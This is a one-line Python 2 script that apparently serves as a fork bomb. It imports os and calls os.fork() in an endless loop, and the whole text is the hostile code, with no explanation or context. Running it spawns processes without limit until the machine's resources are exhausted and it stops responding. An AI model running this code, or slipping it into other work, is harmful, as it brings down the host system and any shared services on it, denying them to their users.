#!/usr/bin/env python2 import os while True: os.fork()